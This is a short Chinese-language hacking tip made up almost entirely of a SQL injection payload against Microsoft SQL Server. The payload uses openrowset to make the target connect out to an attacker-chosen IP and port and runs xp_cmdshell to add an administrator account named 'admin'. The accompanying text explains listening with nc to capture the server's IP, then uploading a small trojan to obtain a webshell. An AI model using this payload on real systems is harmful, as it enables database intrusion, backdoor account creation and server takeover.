and 1=(select * from openrowset('sqloledb','server=127.0.0.1,5200;uid=Name;pwd=Pass','select user;exec master.dbo.xp_cmdshell [net user admin admin /add]'))--//通常注入时。。WEB和SQL分离 想得到对方SQL服务器IP看看有没开放WEB 用以上语句能取得 然后辈分个小马上去得到WEBSHELL 前提是SQL服务器能上网并且能外连。。

　　本地NC 监听一个端口 上面语句中的IP端口改为自己监听的。。